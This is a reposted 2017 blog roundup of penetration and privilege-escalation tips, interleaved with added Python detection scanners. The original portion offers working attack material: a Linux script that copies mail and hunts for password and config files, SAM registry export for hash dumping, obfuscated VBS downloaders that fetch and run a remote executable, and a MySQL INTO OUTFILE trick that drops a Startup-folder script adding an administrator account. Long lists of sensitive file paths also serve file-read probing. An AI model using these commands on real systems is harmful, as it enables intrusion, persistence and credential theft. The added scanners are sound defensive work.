Privilege escalation, penetration, experience and tips roundup (Part 3)

Published by 科技小能手 on 2017-11-12

Packing a folder with tar:

1. tar packing:

tar -cvf /home/public_html.tar /home/public_html --exclude='*.gif' --exclude='/xx/xx/*'

(--exclude='*.gif' excludes files, --exclude='/xx/xx/*' excludes a directory.)

ALZip packing (Korean): alzip -a D:\WEB d:\web*.rar

{

Note:

On tar packing: Linux does not decide a file's type by its extension.

If compressing, tar -ztf *.tar.gz lists the contents of the archive and tar -zxf *.tar.gz extracts it.

So this form is better: tar -czf /home/public_html.tar.gz /home/public_html --exclude='*.gif' --exclude='/xx/xx/*'

}

Run systeminfo first before escalating privileges.

Token vulnerability, patch number KB956572

Churrasco          kb952004

Packing with RAR from the command line:

rar a -k -r -s -m3 c:\1.rar c:\folder

 

Scripts for collecting system information:

For Windows:

@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at - with atq#####
schtasks /query
echo.
echo ####task-list#############
tasklist /svc
echo.
echo ####net-work information
ipconfig /all
route print
arp -a
netstat -an
ipconfig /displaydns
echo.
echo #######service############
sc query type= service state= all
echo #######file-##############
cd
tree /F

For Linux:

#!/bin/bash
echo "####### getting sysinfo ####"
echo "###### usage: ./getinfo.sh >/tmp/sysinfo.txt"
echo "####### basic information ##"
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
###### stole the mail...... ######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo "ur id is: $(id)"
echo "### atq & crontab #####"
atq
crontab -l
echo "##### about var #####"
set
echo "##### about network ###"
#### this is the point in pentest, but i am a new bird, so u need to add some in it
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "######## user ####"
cat /etc/passwd | grep -i sh
echo "###### service ####"
chkconfig --list
for i in oracle mysql tomcat samba apache ftp; do
    cat /etc/passwd | grep -i "$i"
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>/dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
### maybe can use "tree /" ###
echo "## packing up #########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

 

How to obtain local hashes when GetHashes is not AV-evading:

First export the registry:

Windows 2000: regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

Windows 2003: reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg

    Mind the permissions: by default the SAM key in the registry cannot be accessed. It must be set to Full Control before it can be read (this matters for interactive logons; with SYSTEM privileges it can be ignored).

    The rest is simple: download the exported registry file to your own machine, modify the registry file header, import it locally, and then run a hash-dumping tool against the local users.

Remember to change your own account password back after dumping the hashes!

    When GetHashes cannot obtain the hashes, IceSword (冰刃) can be used to copy the sam file to the desktop. As far as I know, a certain person used this method several times on virtual machines they could not log into because they did not know the password!~

 

VBS downloaders:

1:

echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs

2:

On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
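A detection-side counterpart, added here and not part of the original post: a small Python scanner that folds the split-string obfuscation of script 2 back together and then looks for the object combination a downloader needs (HTTP client, ADODB.Stream sink, SaveToFile, optional WScript.Shell execution). Both samples are constructed; the suspect one reproduces the post's second script.

```python
import re

# Constructed sample: the obfuscated downloader (script 2 above) as a scanner would see it on disk.
SUSPECT_VBS = r'''On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
'''

# Constructed benign sample: a logon script that only maps a network drive.
BENIGN_VBS = r'''Set net = CreateObject("WScript.Network")
net.MapNetworkDrive "H:", "\\fileserver\home"
'''

# A downloader needs an HTTP client, a byte sink, a write-to-disk call and, usually, an execution primitive.
INDICATORS = {
    "http_client": re.compile(r"(msxml2|microsoft)\.(server)?xmlhttp|winhttp\.winhttprequest", re.I),
    "stream_sink": re.compile(r"adodb\.stream", re.I),
    "write_to_disk": re.compile(r"\.savetofile\b", re.I),
    "execute": re.compile(r"wscript\.shell|shell\.application|\.run\s*[\"(]", re.I),
}
CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')

def fold_string_concat(src: str) -> str:
    """Join adjacent quoted literals ("Mi"+"cro"+"soft" -> "Microsoft") until nothing changes,
    so split-string obfuscation cannot hide the object names from plain matching."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src

def scan_vbs(src: str) -> dict:
    """Report which indicator families are present after de-obfuscation; verdict is
    'downloader' when client, sink and write-to-disk all occur together."""
    folded = fold_string_concat(src)
    report = {name: bool(rx.search(folded)) for name, rx in INDICATORS.items()}
    report["obfuscated"] = folded != src
    core = ("http_client", "stream_sink", "write_to_disk")
    report["verdict"] = "downloader" if all(report[k] for k in core) else "clean"
    return report

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT_VBS), ("benign", BENIGN_VBS)):
        print(label, scan_vbs(sample))
```

The batch form of script 1 (a run of `echo ... >>x.vbs` lines) produces the same object names on disk, so the same scanner applies once the dropped file exists.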

 

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
select * from a into outfile "C:\Documents and Settings\All Users\「開始」選單\程式\啟動\a.vbs";
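The write above only works because the MySQL account holds the FILE privilege and secure_file_priv does not confine writes to one directory. As an added example (not from the original post), this Python audit reads a constructed excerpt of the MySQL general query log, picks out every INTO OUTFILE / INTO DUMPFILE, and grades the target path: a write into a startup folder or web root is critical, a write under the assumed secure_file_priv directory C:\mysql-files is allowed, anything else is suspicious.

```python
import re
from pathlib import PureWindowsPath

# Constructed MySQL general-query-log excerpt (time, connection id, command, argument).
GENERAL_LOG = r'''2017-11-12T10:01:02.000000Z   12 Query   select * from users where id=1
2017-11-12T10:01:05.000000Z   12 Query   select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"
2017-11-12T10:01:09.000000Z   13 Query   SELECT data INTO DUMPFILE 'C:\\mysql-files\\export.bin'
2017-11-12T10:01:11.000000Z   13 Query   select 1 into outfile '/var/www/html/shell.php'
2017-11-12T10:01:15.000000Z   14 Query   select 1 into outfile 'C:\\temp\\x.txt'
'''

OUTFILE = re.compile(r"\binto\s+(outfile|dumpfile)\s+(['\"])(.*?)\2", re.I)

# Assumed value of secure_file_priv: the only directory the server should be allowed to write into.
ALLOWED_DIR = PureWindowsPath(r"C:\mysql-files")

# Locations where a written file gets executed or served: a write here is persistence or a webshell.
CRITICAL_MARKERS = ("\\startup\\", "\\system32\\", "\\inetpub\\wwwroot\\", "/var/www/")

def file_write_target(query: str):
    """(kind, path) for a query that writes a file via INTO OUTFILE/DUMPFILE, else None."""
    m = OUTFILE.search(query)
    if not m:
        return None
    # MySQL string literals escape backslashes; collapse them back to real separators.
    return m.group(1).lower(), m.group(3).replace("\\\\", "\\")

def classify_write(path: str) -> str:
    """'critical' in an execute/serve location, 'allowed' under ALLOWED_DIR, else 'suspicious'."""
    low = path.lower()
    if any(marker in low for marker in CRITICAL_MARKERS):
        return "critical"
    if "/" not in path and ALLOWED_DIR in PureWindowsPath(path).parents:
        return "allowed"
    return "suspicious"

def audit_general_log(text: str) -> list:
    """(connection_id, severity, path) for every file-writing query in the log text."""
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 3)          # time, connection id, command, argument
        if len(parts) == 4 and parts[2] == "Query":
            target = file_write_target(parts[3])
            if target:
                findings.append((int(parts[1]), classify_write(target[1]), target[1]))
    return findings
```

The same classification applies when the log is a MySQL audit plugin output or a proxy capture; only the line-splitting in audit_general_log changes.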

 

Directory tricks in cmd:

List all the directories on d:

for /d %i in (d:\freehost\*) do @echo %i

Show the folders in the current path whose names are only 1-3 characters long:

for /d %i in (???) do @echo %i

Using the current directory as the search path, list every EXE file in it and its subdirectories:

for /r %i in (*.exe) do @echo %i

Using a specified directory as the search path, list all files in it and its subdirectories:

for /r "f:\freehost\hmadesign\web" %i in (*.*) do @echo %i

This displays the contents of a.txt: because of /f, the loop reads the lines of a.txt:

for /f %i in (c:\1.txt) do echo %i

The character after delims= (here a space) is the delimiter, and tokens= selects which field to take:

for /f "tokens=2 delims= " %i in (a.txt) do echo %i

 

Some common paths on Linux systems:

/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_log.old
/usr/local/apache/logs/error_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh

 

Some common paths on Windows systems (c: can be swapped for d: or e:; for example, FreeHost (星外) and HZHost (華眾) virtual-hosting panels usually put things on d:):

c:\windows\php.ini
c:\boot.ini
c:\1.txt
c:\a.txt
c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
c:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe
c:\hzhost\databases\url.asp
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「開始」選單\程式\7i24虛擬主機管理平臺\自動設定[受控端].lnk
C:\Documents and Settings\All Users\「開始」選單\程式\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
c:\www\index.html
c:\WWWROOT\index.html
c:\website\index.html
c:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
c:\wwwsite\default.asp
c:\WWWROOT\default.asp
c:\web\default.php
c:\www\default.php
c:\WWWROOT\default.php
c:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
C:\Program Files\Microsoft Office\OFFICE11\winword.exe
C:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
C:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文字文件.txt
C:\Documents and Settings\Administrator\桌面\新建 文字文件.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
C:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
C:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
C:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
c:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
c:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
c:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmail\Foxmail.exe
C:\Program Files\Foxmail\accounts.cfg
C:\Program Files\Tencent\Foxmail\Foxmail.exe
C:\Program Files\Tencent\Foxmail\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\騰訊遊戲\QQGAME\readme.txt
c:\Program Files\Tencent\騰訊遊戲\QQGAME\readme.txt
c:\Program Files\Tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe
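Added example, not part of the original post, covering both the Linux and the Windows path lists above: the same paths a file-read probe walks through make a detection dictionary. This Python scanner runs a subset of them over constructed web-server access-log lines, normalizing URL (double) encoding, backslashes, null-byte suffixes and dots-and-slashes traversal before matching, so `..%252f..%252fetc%252fshadow` and `....//usr/local/php/lib/php.ini%00.jpg` are both caught.

```python
import re
from urllib.parse import parse_qsl, unquote

# Detection dictionary: a subset of the Linux and Windows paths listed above (lower-case, forward slashes).
WATCHED_PATHS = ["/etc/passwd", "/etc/shadow", "/etc/httpd/conf/httpd.conf", "/etc/my.cnf",
                 "/var/log/apache2/access.log", "/usr/local/php/lib/php.ini",
                 "c:/boot.ini", "c:/windows/php.ini", "c:/windows/system32/config/sam",
                 "c:/program files/mysql/mysql server 5.0/my.ini"]
WATCHED_NAMES = ("passwd", "shadow", "httpd.conf", "php.ini", "my.cnf", "my.ini", "boot.ini")

# Constructed access-log lines in common log format; the first one is benign.
ACCESS_LOG = r'''10.0.0.5 - - [12/Nov/2017:10:00:01 +0800] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [12/Nov/2017:10:00:02 +0800] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1390
10.0.0.9 - - [12/Nov/2017:10:00:03 +0800] "GET /index.php?page=..%252f..%252fetc%252fshadow HTTP/1.1" 500 0
10.0.0.9 - - [12/Nov/2017:10:00:04 +0800] "GET /show.asp?f=c:\windows\system32\config\sam HTTP/1.1" 404 0
10.0.0.9 - - [12/Nov/2017:10:00:05 +0800] "GET /dl.php?file=....//....//usr/local/php/lib/php.ini%00.jpg HTTP/1.1" 200 80
'''

REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def normalize(value: str) -> str:
    """Decode until stable (defeats double encoding), unify separators, drop NUL bytes, then
    collapse any dots-and-slashes run so ../../etc/passwd and ....//etc/passwd both become /etc/passwd."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    value = value.replace("\\", "/").replace("\x00", "").lower()
    return re.sub(r"/{2,}", "/", re.sub(r"(\.+/+)+", "/", value))

def suspicious_params(target: str) -> list:
    """Watched paths or file names referenced by any query parameter of a request target."""
    hits = set()
    for _, raw in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        norm = normalize(raw)
        hits.update(p for p in WATCHED_PATHS if p in norm)
        hits.update(n for n in WATCHED_NAMES if norm.rsplit("/", 1)[-1].startswith(n))
    return sorted(hits)

def scan_access_log(text: str) -> list:
    """(client_ip, target, status, hits) for each request that references a watched file."""
    findings = []
    for line in text.splitlines():
        m = REQ.match(line)
        if m and (hits := suspicious_params(m.group(2))):
            findings.append((m.group(1), m.group(2), int(m.group(3)), hits))
    return findings
```

A 200 status on a hit (the passwd and php.ini lines) is the case worth paging on; 404/500 hits still identify the probing client.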

This article is reposted from gaodi2002's 51CTO blog; original link: http://blog.51cto.com/gaodi2002/1618134

